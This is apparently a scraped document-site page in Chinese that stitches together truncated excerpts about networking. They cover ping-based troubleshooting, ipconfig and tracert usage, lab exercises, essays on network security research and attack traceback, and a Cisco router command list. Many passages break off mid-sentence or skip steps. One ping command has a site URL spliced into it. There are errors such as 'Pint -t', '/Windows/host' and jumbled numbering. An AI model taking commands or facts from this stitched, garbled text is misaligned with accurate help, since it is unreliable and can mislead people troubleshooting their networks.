命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP 地址。 ping 局域网内其他IP--这个命令应该离开你的计算机，经过网卡及网络电缆到达其他计算机， 再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP 地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。 ping 网关IP--这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。 ping 远程IP--如果收到4 个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet （但不排除ISP 的DNS 会有问题）。 ping localhost--localhost 是个作系统的网络保留名，它是127.0.0.1 的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件 （/Windows/host ）中存在问题。 ping https://www.360docs.net/doc/303014478.html,-- 对这个域名执行Pin ... 地址，通常是通过DNS 服务器如果这里出现故障，则表示DNS 服务器的IP 地址配置不正确或DNS 服务器有故障（对于拨号上网用户，某些ISP

网络安全技术研究的目的、意义和现状

网络安全技术综述 研究目的： 随着互联网技术的不断发展和广泛应用，计算机网络在现代生活中的作用越来越重要，如今，个人、企业以及政府部门，国家军事部门，不管是天文的还是地理的都依靠网络传递信息，这已成为主流，人们也越来越依赖网络。然而，网络的开放性与共享性容易使它受到外界的攻击与破坏，网络信息的各种入侵行为和犯罪活动接踵而至，信息的安全保密性受到严重影响。因此，网络安全问题已成为世界各国政府、企业及广大网络用户最关心的问题之一。 21世纪全世界的计算机都将通过Internet联到一起，信息安全的内涵也就发生了根本的变化。它不仅从一般性的防卫变成了一种非常普通的防范，而且还从一种专门的领域变成了无处不在。当人类步入21世纪这一信息社会、网络社会的时候，我国将建立起一套完整的网络安全体系，特别是从政策上和法律上建立起有中国自己特色的网络安全体系。 网络安全技术指致力于解决诸如如何有效进行介入控制，以及何如保证数据传输的安全性的技术手段，主要包括物理安全分析技术，网络结构安全分析技术，系统安全分析技术，管理安全分析技术，及其它的安全服务和安全机制策略。在网络技术高速发展的今天，对网络安全技术的研究意义重大，它关系到小至个人的利益，大至国家的安全。对网络安全技术的研究就是为了尽最大的努力为个人、国家创造一个良好的网络环境，让网络安全技术更好的为广大用户服务。 研究意义： 一个国家的信息安全体系实际上包括国家的法规和政策,以及技术与市场的发展平台.我国在构建信息防卫系统时,应着力发展自己独特的安全产品,我国要 想真正解决网络安全问题,最终的办法就是通过发展民族的安全产业,带动我国网络安全技术的整体提高。信息安全是国家发展所面临的一个重要问题.对于这个问题,我们还没有从系统的规划上去考虑它,从技术上,产业上,政策上来发展它.政府不仅应该看见信息安全的发展是我国高科技产业的一部分,而且应该看到,发展安全产业的政策是信息安全保障系统的一个重要组成部分,甚至应该看到它对我国未来电子化,信息化的发展将起到非常重要的作用。

常用到的win7网络命令介绍

常用到的win7网络命令介绍 Ping Ping是测试网络联接状况以及信息包发送和接收状况非常有用的工具，是网络测试最常用的命令。Ping向目标主机(地址)发送一个回送请求数据包，要求目标主机收到请求后给予答复，从而判断网络的响应时间和本机是否与目标主机(地址)联通。 如果执行Ping不成功，则可以预测故障出现在以下几个方面：网线故障，网络适配器配置不正确，IP地址不正确。如果执行Ping 成功而网络仍无法使用，那么问题很可能出在网络系统的软件配置方面，Ping成功只能保证本机与目标主机间存在一条连通的物理路径。 命令格式： ping IP地址或主机名 [-t] 参数含义： -t不停地向目标主机发送数据。 校内网关 10.13.206.1 唐河联通网关 10.13.0.165 南阳市网关 10.0.0.10 郑州网关 61.168.253.30 IPConfig

IPConfig实用程序和它的等价图形用户界面。这些信息一般用来检验人工配置的TCP/IP设置是否正确。但是，如果你的计算机和所在的局域网使用了动态主机配置协议(Dynamic Host Configuration Protocol，DHCP--Windows NT下的一种把较少的IP地址分配给较多主机使用的协议，类似于拨号上网的动态IP分配)，这个程序所显示的信息也许更加实用。这时，IPConfig可以让你了解你的计算机是否成功的租用到一个IP地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。 命令格式： Ipconfig [/all] 参数含义： /all显示所有本机网络信息。 注：可查看当前电脑网卡物理地址（全世界唯一地址） Tracert Tracert命令用来显示数据包到达目标主机所经过的路径，并显示到达每个节点的时间。命令功能同Ping类似，但它所获得的信息要比Ping命令详细得多，它把数据包所走的全部路径、节点的IP以及花费的时间都显示出来。该命令比较适用于大型网络。 命令格式： Tracert IP地址或主机名 [-d] 参数含义：

网络常用命令

第一部分网络常用命令 一实验内容 熟悉网络常用命令及其工作机制 二实验目的 熟练掌握每个命令的基本功能、命令格式、相关参数说明、使用技巧等 三实验步骤 1. Ping命令 工作机制：用来测试网络连接状态以及信息包发送、接收状态。网络上的机器都有唯一确定的IP地址，按照目标IP地址给对方发送一个数据包，对方要返回一个同样大小 的数据包。根据返回值可以确定目标主机是否存在以及目标主机得操作系统类 型。 相关参数：输入ping /?后ping命令的相关参数都会出现，如下图所示。 Ping -t 表示将不间断向目标IP发送数据包，直到被用户以Ctrl+C中断。主要用

于网络调试，可以判断网络是否畅通。 向目的IP发送了4个数据报，并收到4个数据报，表明网络畅通。 ping –n 连续ping n个包。按照缺省设置，Windows上运行的Ping命令发送4个ICMP （网间控制报文协议）回送请求，每个32字节数据，如果一切正常，你应能得到4个回送应答。 如上图所示，收到4个数据报，每个为32字节，有效时间均为55.并统计了发送和接收的个数，最大时间，最小时间，平均时间。

设置n的大小，向目标地址发送5个数据报并收到5个，并统计各种信息。 Ping –i ttl设置有效期。 已知本地主机到119.75.218.45的TTL为55，设置TTL为4时，显示TTLexpired in transit 表明在传播途中期满。

设置TTL为56时，可正常到达并且默认状态下发送并接收4个数据报。 2.ipconfig命令 工作机制：获得主机配置信息，包括 IP 地址、子网掩码和默认网关。该诊断命令显示所有当前的 TCP/IP 网络配置值，刷新动态主机配置协议（DHCP）和域名 系统（DNS）设置。 相关参数：输入ipconfig /?后显示其所有参数。如下图所示： Ipconfig /all 用于显示本地主机的所有配置信息。

常用的9个网络命令

实验：网络常见的9个命令 1．ping命令 ping是个使用频率极高的实用程序，主要用于确定网络的连通性。这对确定网络是否正确连接，以及网络连接的状况十分有用。简单的说，ping就是一个测试程序，如果ping运行正确，大体上就可以排除网络访问层、网卡、Modem的输入输出线路、电缆和路由器等存在的故障，从而缩小问题的范围。 ping能够以毫秒为单位显示发送请求到返回应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络，连接速度比较快。ping还能显示TTL（TimeToLive，生存时间）值，通过TTL值可以推算数据包通过了多少个路由器。 (1)命令格式 ping??主机名 ping??域名 如果测试成功，表明网卡、TCP/IP协议的安装、IP地址、子网掩码的设置正常。如果测试不成功，就表示TCP/IP的安装或设置存在有问题。 ②ping本机IP地址 如果测试不成功，则表示本地配置或安装存在问题，应当对网络设备和通讯介质进行测试、检查并排除。 ③ping局域网内其他IP 如果测试成功，表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码不正确或网卡配置错误或电缆系统有问题。 ④ping网关IP

这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够做出应答。 ⑤ping远程IP 如果收到正确应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。 ⑥pinglocalhost local ⑦ping 对此域名执行Ping命令，计算机必须先将域名转换成IP地址，通常是通过DNS服务器。如果这里出现故障，则表示本机DNS服务器的IP地址配置不正确，或它所访问的DNS服务器有故障 如果上面所列出的所有ping （3）ping命令的常用参数选项 pingIP-t：连续对IP地址执行ping ping其他主机或其他主机ping你的主机时，而显示主机 “设置良好”主机的ping结果进行对比。? ipconfig实用程序可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。 而且，如果计算机和所在的局域网使用了动态主机配置协议DHCP，使用ipconfig命令可以了解到你的计算机是否成功地租用到了一个IP地址，如果已经租用到，则可以了解它目前得到的是什么地址，包括IP地址、子网掩码和缺省网关等网络配置信息。 下面给出最常用的选项： (1)ipconfig：当使用不带任何参数选项ipconfig命令时，显示每个已经配置了的接口的IP地址、子网掩码和缺省网关值。 (2)ipconfig/all：当使用all选项时，ipconfig能为DNS和WINS服务器显示它已配置且所有使用的附加信息，并且能够显示内置于本地网卡中的物理地址（MAC）。如果IP地址是从DHCP服务器租用的，ipconfig将显示

网络攻击溯源技术概述

引言 随着互联网覆盖面的不断扩大，网络安全的重要性不断增加。面对层出不穷的新型网络入侵技术和频率越来越高的网络入侵行为，对高级IDS （intrusion detection system）的需求日益迫切。从20 世纪70 年代开始了网络攻击防护措施的最初研究，本文首先分析了网络溯源面临的问题，然后述了溯源的分类和应用场景，最后介绍了多种溯源技术的优点。 计算机网络是计算机技术和通信技术发展到一定程度相结合的产物，Internet的出现更是将网络技术和人类社会生活予以紧密的结合。随着网络技术的飞速发展，越来越多的传统运作方式正在被低耗、开放、高效的分布式网络应用所替代，网络已经成为人们日常生活中不可缺少的一部分。但是，随之而来基于网络的计算机攻击也愈演愈烈，尤其是DDoS攻击，攻击者利用网络的快速和广泛的互联性，使传统意义上的安全措施基本丧失作用，严重威胁着社会和国家的安全；而且网络攻击者大都使用伪造的IP地址，使被攻击者很难确定攻击源的位置，从而不能实施有针对性地防护策略。这些都使得逆向追踪攻击源的追踪技术成为网络主动防御体系中的重要一环，它对于最小化攻击的当前效果、威慑潜在的网络攻击都有着至关重要的作用。 近年来互联网飞速发展，截至2011年6 月底，中国网民数量达到2.53 亿，网民规模跃居世界第一位，普及率达19.1%，全球普及率已经达到21.1%。互联网已经拥有足够庞大的用户基础，网上有游戏、聊天、论坛、邮件、商场、新闻等不同的应用和服务，现实生活中存在的现象、业务、社会关系以及服务在网络上都有不同程度的体现，互联网已经成为名副其实的虚拟社会。现实生活中除了存在道德约束以外，还有法律威慑———违法犯罪活动会被追查，犯罪活动实施者为此可能付出很大的代价甚至人身自由。而与现实生活不同的是在网络虚拟社会中似乎只有类似道德约束的用户自律，却没有法律威慑。网络上大量存在DDoS 攻击、木马、蠕虫、僵尸网络、非授权访问、发送垃圾邮件等恶意行为，但是由于网络匿名传统以及溯源能力的缺失，上述恶意行为即使涉及现实生活的违法犯罪，也很难有效取证和追查，网络犯罪实施者因此有恃无恐，更加猖獗。近年来，随着社会生活越来越依赖互联网，互联网安全问题已经在抑制网络健康

实验一常用网络命令

实验1常用网络命令 1．ping命令 ping是个使用频率极高的实用程序，主要用于确定网络的连通性。这对确定网络是否正确连接，以及网络连接的状况十分有用。简单的说，ping就是一个测试程序，如果ping运行正确，大体上就可以排除网络访问层、网卡、Modem的输入输出线路、电缆和路由器等存在的故障，从而缩小问题的范围。 ping能够以毫秒为单位显示发送请求到返回应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络，连接速度比较快。ping还能显示TTL（Time To Live，生存时间）值，通过TTL 值可以推算数据包通过了多少个路由器。 (1) 命令格式 ping主机名 ping域名 ping IP地址 如图所示，使用ping命令检查到I的计算机的连通性，该例为连接正常。共发送了四个测试数据包，正确接收到四个数据包。 (2) ping命令的基本应用 一般情况下，用户可以通过使用一系列ping命令来查找问题出在什么地方，或检验网络运行的情况。下面就给出一个典型的检测次序及对应的可能故障： ① 如果测试成功，表明网卡、TCP/IP协议的安装、IP地址、子网掩码的设置正常。如果测试不成功，就表示TCP/IP的安装或设置存在有问题。 ②ping 本机IP地址 如果测试不成功，则表示本地配置或安装存在问题，应当对网络设备和通讯介质进行测试、检查并排除。 ③ping局域网内其他IP 如果测试成功，表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码不正确或网卡配置错误或电缆系统有问题。 ④ping 网关IP 这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够做出应答。 ⑤ping 远程IP 如果收到正确应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。 ⑥ping localhost ⑦ping 对此域名执行Ping命令，计算机必须先将域名转换成IP地址，通常是通过DNS服务器。如果这里出现故障，则表示本机DNS服务器的IP地址配置不正确，或它所访问的DNS服务器有故障如果上面所列出的所有ping命令都能正常运行，那么计算机进行本地和远程通信基本上就没有问题了。但是，这些命令的成功并不表示你所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。

路由器常用命令

CCNA、NP路由器常用命令大全 一、基本命令介绍 1、Router >：用户模式（简单的查看和测试） 2、#：特权模式（所有的查看和测试，以及保存） 3、Configure terminal ：全局配置模式Enable：特权模式 4、Hostname cisco(主机名)：更改名字 5、No hostname cisco ：删除以前操作 6、Disable：从特权模式恢复用户模式 7、Exit（退出）Write（保存）Copy run start （保存） 8、Reload：重启设备 9、图标含意：* ：预备缺省路由C：直连路由S：静态路由 10、Pint -t 202.102.1.2 ：一直Ping指定IP 11、No logging console ：关闭Console信息 12、Terminal monitor ：远程登录下显示日志信息 13、Traceroute 5.5.5.0 ：查看到达网络所经过的路径 二、基本命令配置 1、Hostname R1：修改主机 2、No ip domain lookup ：关闭域名查找 3、Line console 0 ：进入Console控制台 4、exec-timeout 0 0 ：设置超时时间（永不超时0 0） 5、Logging synnchronous ：日志同步（命令不尾随日志显示） 三、查看配置命令 1、Show ip route ：查看路由表 2、Show ip ospf database ：查看OSPF链路状态信息 3、Show ip protocols ：查看动态路由协议 4、Show ip eigrp neighbors ：查看EIGRP的邻居表 5、Show ip eigrp topology ：查看EIGRP的拓扑表 6、Show ip route eigrp ：只查看EIGRP路由条目 7、Show ip eigrp neighbor detail ：查看EIGRP的详细邻居表 9、Show ip interface brief ：查看所有接口信息 8、Show ip ospf neighbor ：查看OSPF邻居表 9、Show ip ospf database router ：查看OSPF一类LSA 10、Show ip ospf database summary ：查看OSPF三类LSA 11、Show ip ospf database asbr-summary ：查看OSPF四类LSA 12、Show ip ospf int f0/0 ：查看OSPF接口信息 13、Show ip route ospf ：只查看OSPF路由条目 14、Show mac-address-table ：查看交机的MAC地址 15、Show running-config ：查看当前所有配置 16、Show access-list ：查看ACL定义条目 17、Show run ｜s r e ：只查看EIGRP配置